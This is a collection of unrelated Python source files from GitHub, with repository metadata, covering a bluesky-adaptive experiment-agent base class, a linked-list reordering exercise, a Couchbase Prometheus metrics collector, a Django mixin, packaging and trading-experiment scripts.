_create_suggestion_list(self, points: Sequence, uid: str, measurement_plan: Optional[Callable] = None):\n \"\"\"Create suggestions for adjudicator\"\"\"\n suggestions = []\n for point in points:\n plan_name, args, kwargs = (\n self.measurement_plan(point) if measurement_plan is None else measurement_plan(point)\n )\n kwargs.setdefault(\"md\", {})\n kwargs[\"md\"].update(self.default_plan_md)\n kwargs[\"md\"][\"agent_ask_uid\"] = uid\n suggestions.append(\n Suggestion(\n ask_uid=uid,\n plan_name=plan_name,\n plan_args=args,\n plan_kwargs=kwargs,\n )\n )\n return suggestions\n\n def generate_suggestions_for_adjudicator(self, batch_size: int):\n \"\"\"Calls ask, sends suggestions to adjudicator, and writes out events.\n This will create one event for each suggestion.\"\"\"\n next_points, uid = self._ask_and_write_events(batch_size)\n logger.info(f\"Issued ask and sending to the adjudicator. {uid}\")\n suggestions = self._create_suggestion_list(next_points, uid)\n msg = AdjudicatorMsg(\n agent_name=self.instance_name,\n suggestions_uid=str(uuid.uuid4()),\n suggestions={self.endstation_key: suggestions},\n )\n self.kafka_producer(ADJUDICATOR_STREAM_NAME, msg.dict())\n\n def generate_report(self, **kwargs):\n doc = self.report(**kwargs)\n uid = self._write_event(\"report\", doc)\n logger.info(f\"Issued report request and writing event. {uid}\")\n\n @staticmethod\n def trigger_condition(uid) -> bool:\n return True\n\n def _tell(self, uid):\n \"\"\"Private tell to encapsulate the processing of a uid.\n This allows the user tell to just consume an independent and dependent variable.\n\n Parameters\n ----------\n uid : str\n Unique key to grab from Tiled.\n \"\"\"\n run = self.exp_catalog[uid]\n try:\n independent_variable, dependent_variable = self.unpack_run(run)\n except KeyError as e:\n logger.warning(f\"Ignoring key error in unpack for data {uid}:\\n {e}\")\n return\n logger.debug(\"Telling agent about some new data.\")\n doc = self.tell(independent_variable, dependent_variable)\n doc[\"exp_uid\"] = uid\n self._write_event(\"tell\", doc)\n self.tell_cache.append(uid)\n\n def _on_stop_router(self, name, doc):\n \"\"\"Document router that runs each time a stop document is seen.\"\"\"\n if name != \"stop\":\n return\n\n uid = doc[\"run_start\"]\n if not self.trigger_condition(uid):\n logger.debug(\n f\"New data detected, but trigger condition not met. The agent will ignore this start doc: {uid}\"\n )\n return\n\n # Tell\n logger.info(f\"New data detected, telling the agent about this start doc: {uid}\")\n self._tell(uid)\n\n # Report\n if self.report_on_tell:\n self.generate_report(**self.default_report_kwargs)\n\n # Ask\n if self.ask_on_tell:\n if self._direct_to_queue:\n self.add_suggestions_to_queue(1)\n else:\n self.generate_suggestions_for_adjudicator(1)\n\n def tell_agent_by_uid(self, uids: Iterable):\n \"\"\"Give an agent an iterable of uids to learn from.\n This is an optional behavior for priming an agent without a complete restart.\"\"\"\n logger.info(\"Telling agent list of uids\")\n for uid in uids:\n logger.info(f\"Telling agent about start document{uid}\")\n self._tell(uid)\n\n def start(self, ask_at_start=False):\n \"\"\"Starts kakfka listener in background thread\n\n Parameters\n ----------\n ask_at_start : bool, optional\n Whether to ask for a suggestion immediately, by default False\n \"\"\"\n logger.debug(\"Issuing Agent start document and starting to listen to Kafka\")\n self._compose_run_bundle = compose_run(metadata=self.metadata)\n self.agent_catalog.v1.insert(\"start\", self._compose_run_bundle.start_doc)\n logger.info(f\"Agent name={self._compose_run_bundle.start_doc['agent_name']}\")\n logger.info(f\"Agent start document uuid={self._compose_run_bundle.start_doc['uid']}\")\n if ask_at_start:\n self.add_suggestions_to_queue(1)\n self._kafka_thread = threading.Thread(target=self.kafka_consumer.start, name=\"agent-loop\", daemon=True)\n self._kafka_thread.start()\n\n def stop(self, exit_status=\"success\", reason=\"\"):\n logger.debug(\"Attempting agent stop.\")\n stop_doc = self._compose_run_bundle.compose_stop(exit_status=exit_status, reason=reason)\n self.agent_catalog.v1.insert(\"stop\", stop_doc)\n self.kafka_producer.flush()\n self.kafka_consumer.stop()\n logger.info(\n f\"Stopped agent with exit status {exit_status.upper()}\"\n f\"{(' for reason: ' + reason) if reason else '.'}\"\n )\n\n def close_and_restart(self, *, clear_tell_cache=False, retell_all=False, reason=\"\"):\n \"\"\"Utility for closing and restarting an agent with the same name.\n This is primarily for methods that change the hyperparameters of an agent on the fly,\n but in doing so may change the shape/nature of the agent document stream. This will\n keep the documents consistent between hyperparameters as individual BlueskyRuns.\n\n Parameters\n ----------\n clear_tell_cache : bool, optional\n Clears the cache of data the agent has been told about, by default False.\n This is useful for a clean slate.\n retell_all : bool, optional\n Resets the cache and tells the agent about all previous data, by default False.\n This can be useful if the agent has not retained knowledge from previous tells.\n reason : str, optional\n Reason for closing and restarting the agent, to be recorded to logs, by default \"\"\n \"\"\"\n self.stop(reason=f\"Close and Restart: {reason}\")\n if clear_tell_cache:\n self.tell_cache = list()\n elif retell_all:\n uids = copy.copy(self.tell_cache)\n self.tell_cache = list()\n self.tell_agent_by_uid(uids)\n self.start()\n\n def signal_handler(self, signal, frame):\n self.stop(exit_status=\"abort\", reason=\"forced exit ctrl+c\")\n sys.exit(0)\n\n def _register_property(self, name: str, property_name: Optional[str] = None, **kwargs):\n \"\"\"Wrapper to register property to bluesky-adaptive server instead of attribute or variable.\n\n Parameters\n ----------\n name : str\n Name by which the variable is accessible through the REST API. The PV name is generated by converting\n the variable names to upper-case letters. The name does not need to match the actual name of\n the variable used in the code. The name should be selected so that it could be conveniently used\n in the API.\n property_name : Optional[str]\n The name of a class property, by default the same name used in the REST API.\n \"\"\"\n\n [kwargs.pop(key, None) for key in (\"getter\", \"setter\")] # Cannot pass getter/setter\n property_name = name if property_name is None else property_name\n register_variable(\n name,\n getter=lambda: getattr(self.__class__, property_name).fget(self),\n setter=lambda x: getattr(self.__class__, property_name).fset(self, x),\n **kwargs,\n )\n\n def _register_method(self, name, method_name=None, **kwargs):\n \"\"\"Wrapper to register generic method to bluesky-adaptive server instead of attribute or variable.\n To call the method, pass the setter a json with of form:\n {value: [[args,],\n {kwargs}]}\n This is a temporary solution that makes use of only the setter API and not a dedicated interface.\n This will be deprecated in the future.\n\n Parameters\n ----------\n name : str\n Name by which the variable is accessible through the REST API. The PV name is generated by converting\n the variable names to upper-case letters. The name does not need to match the actual name of\n the variable used in the code. The name should be selected so that it could be conveniently used\n in the API.\n method_name : Optional[str]\n The name of the method, by default the same name used in the REST API.\n \"\"\"\n [kwargs.pop(key, None) for key in (\"getter\", \"setter\")] # Cannot pass getter/setter\n method_name = name if method_name is None else method_name\n if not isinstance(getattr(self, method_name), Callable):\n raise TypeError(f\"Method {method_name} must be a callable function.\")\n register_variable(name, setter=lambda value: start_task(getattr(self, method_name)(*value[0], **value[1])))\n\n def server_registrations(self) -> None:\n \"\"\"\n Method to generate all server registrations during agent initialization.\n This method can be used in subclasses, to override or extend the default registrations.\n \"\"\"\n self._register_method(\"generate_report\")\n self._register_method(\"add_suggestions_to_queue\")\n self._register_method(\"tell_agent_by_uid\")\n self._register_property(\"queue_add_position\", pv_type=\"str\")\n self._register_property(\"ask_on_tell\", pv_type=\"bool\")\n self._register_property(\"report_on_tell\", pv_type=\"bool\")\n\n @staticmethod\n def qserver_from_host_and_key(host: str, key: str):\n \"\"\"Convenience method to prouduce RE Manager object to manage communication with Queue Server.\n This is one of several paradigms for communication, albeit a common one.\n See bluesky_queueserver_api documentation for more details.\n\n\n Parameters\n ----------\n host : str\n URI for host of HTTP Server\n key : str\n Authorization key for HTTP Server API\n\n Returns\n -------\n qserver : bluesky_queueserver_api.api_threads.API_Threads_Mixin\n \"\"\"\n from bluesky_queueserver_api.http import REManagerAPI\n\n qserver = REManagerAPI(http_server_uri=host)\n qserver.set_authorization_key(api_key=key)\n return qserver\n\n @classmethod\n def from_config_kwargs(\n cls,\n kafka_group_id: str,\n kafka_bootstrap_servers: str,\n kafka_consumer_config: dict,\n kafka_producer_config: dict,\n publisher_topic: str,\n subscripion_topics: List[str],\n data_profile_name: str,\n agent_profile_name: str,\n qserver_host: str,\n qserver_api_key: str,\n **kwargs,\n ):\n \"\"\"Convenience method for producing an Agent from keyword arguments describing the\n Kafka, Tiled, and Qserver setup.\n Assumes tiled is loaded from profile, and the REManagerAPI is based on the http api.\n\n Parameters\n ----------\n kafka_group_id : str\n Required string identifier for the consumer's Kafka Consumer group.\n kafka_bootstrap_servers : str\n Comma-delimited list of Kafka server addresses as a string\n such as ``'broker1:9092,broker2:9092,127.0.0.1:9092'``\n kafka_consumer_config : dict\n Override default configuration or specify additional configuration\n options to confluent_kafka.Consumer.\n kafka_producer_config : dict\n Override default configuration or specify additional configuration\n options to confluent_kafka.Producer.\n publisher_topic : str\n Existing topic to publish agent documents to.\n subscripion_topics : List[str]\n List of existing_topics as strings such as [\"topic-1\", \"topic-2\"]. These should be\n the sources of the Bluesky stop documents that trigger ``tell`` and agent directives.\n data_profile_name : str\n Tiled profile name to serve as source of data (BlueskyRuns) for the agent.\n agent_profile_name : str\n Tiled profile name to serve as storage for the agent documents.\n qserver_host : str\n Host to POST requests to. Something akin to 'http://localhost:60610'\n qserver_api_key : str\n Key for API security.\n kwargs : dict\n Additional keyword arguments for init\n \"\"\"\n from bluesky_queueserver_api.http import REManagerAPI\n from tiled.client import from_profile\n\n kafka_consumer = AgentConsumer(\n topics=subscripion_topics,\n bootstrap_servers=kafka_bootstrap_servers,\n group_id=kafka_group_id,\n consumer_config=kafka_consumer_config,\n )\n kafka_producer = Publisher(\n topic=publisher_topic,\n bootstrap_servers=kafka_bootstrap_servers,\n key=\"\",\n producer_config=kafka_producer_config,\n )\n tiled_data_node = from_profile(data_profile_name)\n tiled_agent_node = from_profile(agent_profile_name)\n\n re_manager = REManagerAPI(http_server_uri=qserver_host)\n re_manager.set_authorization_key(api_key=qserver_api_key)\n\n if \"metadata\" in kwargs:\n kwargs[\"metadata\"].update(\n dict(tiled_data_profile=data_profile_name, tiled_agent_profile=agent_profile_name)\n )\n\n return cls.__init__(\n kafka_consumer=kafka_consumer,\n kafka_producer=kafka_producer,\n tiled_data_node=tiled_data_node,\n tiled_agent_node=tiled_agent_node,\n qserver=re_manager,\n **kwargs,\n )\n\n\nclass MonarchSubjectAgent(Agent, ABC):\n # Drive a beamline. On stop doc check. By default manual trigger.\n\n def __init__(\n self,\n *args,\n subject_qserver: API_Threads_Mixin,\n subject_kafka_producer: Optional[Publisher] = None,\n subject_endstation_key: Optional[str] = \"\",\n **kwargs,\n ):\n \"\"\"Abstract base class for a MonarchSubject agent. These agents only consume documents from one\n (Monarch) source, and can dictate the behavior of a different (Subject) queue.\n This can be useful in a multimodal measurement where\n one measurement is very fast and the other is very slow: after some amount of data collection on the fast\n measurement, the agent can dictate that the slow measurement probe what it considers as interesting. The\n agent maintains the functionality of a regular Agent, and adds plans to the Monarch queue.\n\n By default, the Subject is only directed when manually triggered by the agent server or by\n a kafka directive. If an automated approach to asking the subject is required,\n ``subject_ask_condition`` must be overriden. This is commonly done by using a wall-clock interval,\n and/or a model confidence trigger.\n\n Children of MonarchSubjectAgent must implment the following, through direct inheritence or mixin classes:\n Experiment specific:\n - measurement_plan\n - unpack_run\n - subject_measurement_plan\n Agent specific:\n - tell\n - ask\n - subject_ask\n - report (optional)\n - name (optional)\n\n Parameters\n ----------\n subject_qserver : API_Threads_Mixin\n Object to manage communication with the Subject Queue Server\n subject_kafka_producer : Optional[Publisher]\n Bluesky Kafka publisher to produce document stream of agent actions to Adjudicators\n subject_endstation_key : Optional[str]\n Optional string that is needed for Adjudicator functionality. This keys the qserver API instance to\n a particular endstation. This way child Agents can maintain multiple queues for different unit ops.\n For example, this could be a beamline three letter acronym or other distinct key.\n \"\"\"\n super().__init__(**kwargs)\n self.subject_re_manager = subject_qserver\n self.subject_kafka_producer = subject_kafka_producer\n self.subject_endstation_key = subject_endstation_key\n\n @abstractmethod\n def subject_measurement_plan(self, point: ArrayLike) -> Tuple[str, List, dict]:\n \"\"\"Details for subject plan.\n Fetch the string name of a registered plan, as well as the positional and keyword\n arguments to pass that plan.\n\n Args/Kwargs is a common place to transform relative into absolute motor coords, or\n other device specific parameters.\n\n Parameters\n ----------\n point : ArrayLike\n Next point to measure using a given plan\n\n Returns\n -------\n plan_name : str\n plan_args : List\n List of arguments to pass to plan from a point to measure.\n plan_kwargs : dict\n Dictionary of keyword arguments to pass the plan, from a point to measure.\n \"\"\"\n ...\n\n @abstractmethod\n def subject_ask(self, batch_size: int) -> Tuple[Sequence[Dict[str, ArrayLike]], Sequence[ArrayLike]]:\n \"\"\"\n Ask the agent for a new batch of points to measure on the subject queue.\n\n Parameters\n ----------\n batch_size : int\n Number of new points to measure\n\n Returns\n -------\n docs : Sequence[dict]\n Documents of key metadata from the ask approach for each point in next_points.\n Must be length of batch size.\n next_points : Sequence[ArrayLike]\n Sequence of independent variables of length batch size\n\n \"\"\"\n ...\n\n def subject_ask_condition(self):\n \"\"\"Option to build in a trigger method that is run on using the document router subcription.\n\n Returns\n -------\n bool\n \"\"\"\n return False\n\n def add_suggestions_to_subject_queue(self, batch_size: int):\n \"\"\"Calls ask, adds suggestions to queue, and writes out event\"\"\"\n next_points, uid = self._ask_and_write_events(batch_size, self.subject_ask, \"subject_ask\")\n logger.info(\"Issued ask to subject and adding to the queue. {uid}\")\n self._add_to_queue(next_points, uid, re_manager=self.subject_re_manager, position=\"front\")\n\n def _on_stop_router(self, name, doc):\n ret = super()._on_stop_router(name, doc)\n if name != \"stop\":\n return ret\n\n if self.subject_ask_condition():\n if self._direct_to_queue:\n self.add_suggestions_to_subject_queue(1)\n else:\n raise NotImplementedError\n\n def generate_suggestions_for_adjudicator(self, batch_size: int):\n next_points, uid = self._ask_and_write_events(batch_size, self.subject_ask, \"subject_ask\")\n logger.info(f\"Issued subject ask and sending to the adjudicator. {uid}\")\n suggestions = self._create_suggestion_list(next_points, uid, self.subject_measurement_plan)\n msg = AdjudicatorMsg(\n agent_name=self.instance_name,\n suggestions_uid=str(uuid.uuid4()),\n suggestions={self.subject_endstation_key: suggestions},\n )\n self.subject_kafka_producer(ADJUDICATOR_STREAM_NAME, msg.dict())\n\n def server_registrations(self) -> None:\n super().server_registrations()\n self._register_method(\"add_suggestions_to_subject_queue\")\n","repo_name":"bluesky/bluesky-adaptive","sub_path":"bluesky_adaptive/agents/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":43242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18987403640","text":"from List import ListNode, head1\n#\n#\n# def reorderList(head):\n# # if head is None or head.next is None:\n# # return head\n# # length = 0\n# # index = head\n# # while index is not None:\n# # index = index.next\n# # length += 1\n# # left, right, index = [], [], head\n# # left_length = int((length+1) / 2)\n# # for i in range(left_length):\n# # left.append(index.val)\n# # index = index.next\n# # while index is not None:\n# # right.append(index.val)\n# # index = index.next\n# # right.reverse()\n# # res = ListNode(0)\n# # index = res\n# # i = 0\n# # while length > 1:\n# # index.next = ListNode(left[i])\n# # index = index.next\n# # index.next = ListNode(right[i])\n# # index = index.next\n# # length -= 2\n# # i += 1\n# # if length == 1:\n# # index.next = ListNode(left[i])\n# # return res.next\n# slow, fast = head, head\n# while fast.next is not None and fast.next.next is not None:\n# slow = slow.next\n# fast = fast.next.next\n# i = slow\n# slow = slow.next\n# i.next = None\n# slow = reverseList(slow)\n#\n# p1=head # rejoin 2 parts together\n# p2=slow\n# while p2:\n# t1=p1.next\n# p1.next=p2\n# t2=p2.next\n# p2.next=t1\n# p1=t1\n# p2=t2\n#\n# def reverseList(head):\n#\n# # if head is None or head.next is None:\n# # return head\n# # rest = reverseList(head.next)\n# # res = rest\n# # while rest.next is not None:\n# # rest = rest.next\n# # rest.next = head\n# # head.next = None\n# # return res\n# if head is None or head.next is None:\n# return head\n# if head.next.next is None:\n# index = head\n# index = index.next\n# index.next = head\n# head.next = None\n# return index\n# pre, index, after = head, head.next, head.next.next\n# while after.next is not None:\n# index.next = pre\n# pre = index\n# index = after\n# after = after.next\n# head.next = None\n# index.next = pre\n# after.next = index\n# return after\n#\n#\n# reorderList(h1)\n# while h1 is not None:\n# print(h1.val)\n# h1 = h1.next\n#\n#\n# # Definition for singly-linked list.\n# # class ListNode(object):\n# # def __init__(self, x):\n# # self.val = x\n# # self.next = None\n#\n# class Solution(object):\n# def reorderList(self, head):\n# \"\"\"\n# :type head: ListNode\n# :rtype: void Do not return anything, modify head in-place instead.\n# \"\"\"\n# if head is None or head.next is None or head.next.next is None:\n# head=head\n# else:\n#\n# slow=fast=head # two parts\n# while fast.next and fast.next.next:\n# slow=slow.next\n# fast=fast.next.next\n#\n# head2=slow.next\n# slow.next=None\n#\n# dummy=ListNode(0) # reverse 2nd part\n# dummy.next=head2\n# p=head2.next\n# head2.next=None\n# while p:\n# tmp=p\n# p=p.next\n# tmp.next=dummy.next\n# dummy.next=tmp\n# head2=dummy.next\n#\n# p1=head # rejoin 2 parts together\n# p2=head2\n# while p2:\n# t1=p1.next\n# p1.next=p2\n# t2=p2.next\n# p2.next=t1\n# p1=t1\n# p2=t2\n\n# Definition for singly-linked list.\n\n\nclass Solution(object):\n\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if not head or not head.next or not head.next.next:\n return\n else:\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n h1 = slow.next\n slow.next = None\n pre = None\n now = h1\n while now:\n nx = now.next\n now.next = pre\n pre = now\n now = nx\n h1 = pre\n h2 = head\n # h2.prt()\n # print\n # h1.prt()\n nx2 = None\n nx1 = None\n while h1:\n nx2 = h2.next\n h2.next = h1\n nx1 = h1.next\n h1.next = nx2\n h2 = nx2\n h1 = nx1\n\n\nSolution().reorderList(head1)\nhead1.prt()\n\n\n\n","repo_name":"gitttttt/lc","sub_path":"q143.py","file_name":"q143.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10201360519","text":"import sys\n\nif sys.version_info[0] == 3:\n from .cb_utilities import *\nelse:\n from cb_utilities import *\n\n# class view():\n# def __init__(self):\n# self.service_identifier = None\n\ndef _get_cluster(url, user, passwrd, node_list=[]):\n '''Starts by getting the cluster definition, then creates a node list, then gets metrics for\n the cluster from each node'''\n result = {}\n result['metrics'] = []\n service_nodes = {}\n service_nodes['kv'] = []\n service_nodes['index'] = []\n service_nodes['n1ql'] = []\n service_nodes['eventing'] = []\n service_nodes['fts'] = []\n service_nodes['cbas'] = []\n service_nodes['thisNode'] = \"\"\n current_url = \"\"\n nodes = []\n\n auth = basic_authorization(user, passwrd)\n\n if len(node_list) > 0:\n pass\n else:\n node_list.append(url)\n\n for uri in node_list:\n try:\n _url = \"http://{}:8091/pools/default\".format(uri.split(\":\")[0])\n stats = rest_request(auth, _url)\n current_url = value_to_string(current_url)\n break\n except Exception as e:\n return (result)\n\n for record in stats:\n if record == \"nodes\":\n for node in stats[record]:\n nodes.append(node['hostname'])\n if \"kv\" in node['services']:\n service_nodes['kv'].append(node['hostname'])\n\n if \"index\" in node['services']:\n service_nodes['index'].append(node['hostname'])\n\n if \"n1ql\" in node['services']:\n service_nodes['n1ql'].append(node['hostname'])\n\n if \"eventing\" in node['services']:\n service_nodes['eventing'].append(node['hostname'])\n\n if \"fts\" in node['services']:\n service_nodes['fts'].append(node['hostname'])\n\n if \"cbas\" in node['services']:\n service_nodes['cbas'].append(node['hostname'])\n # if the thisNode attribute is set, save the hostname\n if \"thisNode\" in node.keys() and node['thisNode'] == True:\n service_nodes['thisNode'] = node['hostname']\n result['serviceNodes'] = service_nodes\n result['nodeList'] = nodes\n\n elif record in [\"rebalanceStatus\", \"balanced\"]:\n if record == \"rebalanceStatus\":\n if stats['rebalanceStatus'] == \"none\":\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 0))\n else:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 1))\n elif record == \"balanced\":\n if stats[record]:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 0))\n else:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 1))\n\n elif record in [\"autoCompactionSettings\"]:\n for compaction_type in stats[record]:\n if compaction_type in [\"databaseFragmentationThreshold\",\n \"viewFragmentationThreshold\"]:\n for _metric in stats[record][compaction_type]:\n try:\n int(stats[record][compaction_type][_metric])\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(_metric), stats[record][compaction_type][_metric]))\n except Exception as e:\n pass\n elif record in [\"counters\"]:\n for counter in stats[record]:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n counter, stats[record][counter]))\n\n elif record in [\"storageTotals\"]:\n for storage_type in stats[record]:\n for _metric in stats[record][storage_type]:\n result['metrics'].append(\"{}{} {{type=\\\"cluster\\\"}} {}\".format(\n storage_type, snake_caseify(_metric), stats[record][storage_type][_metric]))\n\n elif record in [\"clusterName\"]:\n result['clusterName'] = stats[record]\n\n elif record in [\"buckets\",\n \"remoteClusters\",\n \"alerts\",\n \"alertsSilenceURL\",\n \"controllers\",\n \"rebalanceProgressUri\",\n \"stopRebalanceUri\",\n \"nodeStatusesUri\",\n \"tasks\",\n \"indexStatusURI\",\n \"checkPermissionsURI\",\n \"serverGroupsUri\",\n \"name\"]:\n pass\n else:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), stats[record]))\n\n return(result)\n","repo_name":"couchbaselabs/cbprometheus_python","sub_path":"src/application/modules/cb_cluster.py","file_name":"cb_cluster.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"71397903469","text":"from .signals import object_viewed_signal\n\n\nclass ObjectViewedMixin(object):\n def get_context_data(self, *args, **kwargs):\n context = super(ObjectViewedMixin, self).get_context_data(*args, **kwargs)\n request = self.request\n instance = context.get('object')\n if instance:\n object_viewed_signal.send(instance.__class__, instance=instance, request=request)\n return context","repo_name":"codingforentrepreneurs/eCommerce","sub_path":"src/analytics/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1459,"dataset":"github-code","pt":"37"} +{"seq_id":"22946967806","text":"from setuptools import setup, find_packages\n\n# reading long description from file\nwith open(\"README.md\", encoding=\"utf-8\") as file:\n long_description = file.read()\n\n\n# specify requirements of your package here\nREQUIREMENTS = [\"pygame\"]\n\n\n# calling the setup function\nsetup(\n name=\"snake\",\n version=\"0.0.1\",\n description=\"A simple snake game\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/douglas-cpp/snake\",\n author=\"Douglas\",\n author_email=\"douglasc.dev@gmail.com\",\n license=\"Apache License 2.0\",\n packages=find_packages(include=[\"snake\"]),\n entry_points={\n \"console_scripts\": [\n \"snake = snake.main:main\",\n ],\n },\n install_requires=REQUIREMENTS,\n keywords=\"game\",\n)\n","repo_name":"douglascdev/snake","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"30700653402","text":"\"\"\"\n有一个已经排好序的数组。现输入一个数,要求按原来的规律将它插入数组中。\n\"\"\"\n\n\ndef insertNumbers(value):\n arrays = [1, 3, 4, 5, 6, 8, 10]\n for i in range(len(arrays)):\n if arrays[i] < int(value) < arrays[i + 1]:\n # 说实话我没看懂\n arrays.insert(i + 1, value)\n print(arrays)\n\n\ninsertNumbers(2)\n","repo_name":"walkingtyphoon/Python-workspace","sub_path":"network/practice/Basic/Demo02/practice05.py","file_name":"practice05.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1950493078","text":"import os\nimport argparse\nfrom settings.hp_grid import HP_MINIBATCH_SIZE\nimport pandas as pd\nfrom settings.default import QUANDL_TICKERS\nfrom settings.fixed_params import MODLE_PARAMS\nfrom mom_trans.backtest import run_all_windows\nimport numpy as np\nfrom functools import reduce\n\n# define the asset class of each ticker here - for this example we have not done this\nTEST_MODE = False\nASSET_CLASS_MAPPING = dict(zip(QUANDL_TICKERS, [\"COMB\"] * len(QUANDL_TICKERS)))\nTRAIN_VALID_RATIO = 0.90\nTIME_FEATURES = False\nFORCE_OUTPUT_SHARPE_LENGTH = None\nEVALUATE_DIVERSIFIED_VAL_SHARPE = True\nNAME = \"experiment_quandl_100assets\"\n\n\ndef main(\n experiment: str,\n train_start: int,\n test_start: int,\n test_end: int,\n test_window_size: int,\n num_repeats: int,\n):\n if experiment == \"LSTM\":\n architecture = \"LSTM\"\n lstm_time_steps = 63\n changepoint_lbws = None\n elif experiment == \"LSTM-CPD-21\":\n architecture = \"LSTM\"\n lstm_time_steps = 63\n changepoint_lbws = [21]\n elif experiment == \"LSTM-CPD-63\":\n architecture = \"LSTM\"\n lstm_time_steps = 63\n changepoint_lbws = [63]\n elif experiment == \"TFT\":\n architecture = \"TFT\"\n lstm_time_steps = 252\n changepoint_lbws = None\n elif experiment == \"TFT-CPD-126-21\":\n architecture = \"TFT\"\n lstm_time_steps = 252\n changepoint_lbws = [126, 21]\n elif experiment == \"TFT-SHORT\":\n architecture = \"TFT\"\n lstm_time_steps = 63\n changepoint_lbws = None\n elif experiment == \"TFT-SHORT-CPD-21\":\n architecture = \"TFT\"\n lstm_time_steps = 63\n changepoint_lbws = [21]\n elif experiment == \"TFT-SHORT-CPD-63\":\n architecture = \"TFT\"\n lstm_time_steps = 63\n changepoint_lbws = [63]\n else:\n raise BaseException(\"Invalid experiment.\")\n\n versions = range(1, 1 + num_repeats) if not TEST_MODE else [1]\n\n experiment_prefix = (\n NAME\n + (\"_TEST\" if TEST_MODE else \"\")\n + (\"\" if TRAIN_VALID_RATIO == 0.90 else f\"_split{int(TRAIN_VALID_RATIO * 100)}\")\n )\n\n cp_string = (\n \"none\"\n if not changepoint_lbws\n else reduce(lambda x, y: str(x) + str(y), changepoint_lbws)\n )\n time_string = \"time\" if TIME_FEATURES else \"notime\"\n _project_name = f\"{experiment_prefix}_{architecture.lower()}_cp{cp_string}_len{lstm_time_steps}_{time_string}_{'div' if EVALUATE_DIVERSIFIED_VAL_SHARPE else 'val'}\"\n if FORCE_OUTPUT_SHARPE_LENGTH:\n _project_name += f\"_outlen{FORCE_OUTPUT_SHARPE_LENGTH}\"\n _project_name += \"_v\"\n for v in versions:\n PROJECT_NAME = _project_name + str(v)\n\n intervals = [\n (train_start, y, y + test_window_size)\n for y in range(test_start, test_end - 1)\n ]\n\n params = MODLE_PARAMS.copy()\n params[\"total_time_steps\"] = lstm_time_steps\n params[\"architecture\"] = architecture\n params[\"evaluate_diversified_val_sharpe\"] = EVALUATE_DIVERSIFIED_VAL_SHARPE\n params[\"train_valid_ratio\"] = TRAIN_VALID_RATIO\n params[\"time_features\"] = TIME_FEATURES\n params[\"force_output_sharpe_length\"] = FORCE_OUTPUT_SHARPE_LENGTH\n\n if TEST_MODE:\n params[\"num_epochs\"] = 1\n params[\"random_search_iterations\"] = 2\n\n if changepoint_lbws:\n features_file_path = os.path.join(\n \"data\",\n f\"quandl_cpd_{np.max(changepoint_lbws)}lbw.csv\",\n )\n else:\n features_file_path = os.path.join(\n \"data\",\n \"quandl_cpd_nonelbw.csv\",\n )\n\n run_all_windows(\n PROJECT_NAME,\n features_file_path,\n intervals,\n params,\n changepoint_lbws,\n ASSET_CLASS_MAPPING,\n [32, 64, 128] if lstm_time_steps == 252 else HP_MINIBATCH_SIZE,\n test_window_size,\n )\n\n\nif __name__ == \"__main__\":\n\n def get_args():\n \"\"\"Returns settings from command line.\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Run DMN experiment\")\n parser.add_argument(\n \"experiment\",\n metavar=\"c\",\n type=str,\n nargs=\"?\",\n default=\"TFT-CPD-126-21\",\n choices=[\n \"LSTM\",\n \"LSTM-CPD-21\",\n \"LSTM-CPD-63\",\n \"TFT\",\n \"TFT-CPD-126-21\",\n \"TFT-SHORT\",\n \"TFT-SHORT-CPD-21\",\n \"TFT-SHORT-CPD-63\",\n ],\n help=\"Input folder for CPD outputs.\",\n )\n parser.add_argument(\n \"train_start\",\n metavar=\"s\",\n type=int,\n nargs=\"?\",\n default=1990,\n help=\"Training start year\",\n )\n parser.add_argument(\n \"test_start\",\n metavar=\"t\",\n type=int,\n nargs=\"?\",\n default=2016,\n help=\"Training end year and test start year.\",\n )\n parser.add_argument(\n \"test_end\",\n metavar=\"e\",\n type=int,\n nargs=\"?\",\n default=2022,\n help=\"Testing end year.\",\n )\n parser.add_argument(\n \"test_window_size\",\n metavar=\"w\",\n type=int,\n nargs=\"?\",\n default=1,\n help=\"Test window length in years.\",\n )\n parser.add_argument(\n \"num_repeats\",\n metavar=\"r\",\n type=int,\n nargs=\"?\",\n default=1,\n help=\"Number of experiment repeats.\",\n )\n\n args = parser.parse_known_args()[0]\n\n return (\n args.experiment,\n args.train_start,\n args.test_start,\n args.test_end,\n args.test_window_size,\n args.num_repeats,\n )\n\n main(*get_args())\n","repo_name":"kieranjwood/trading-momentum-transformer","sub_path":"examples/run_dmn_experiment.py","file_name":"run_dmn_experiment.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","stars":327,"dataset":"github-code","pt":"37"} +{"seq_id":"41300940186","text":"import os\nimport json\n\nimport boto3\nfrom identity_check import *\nfrom response import *\nfrom error_messages import *\nfrom lambda_base_class import LambdaBaseClass\nfrom models.task_model import 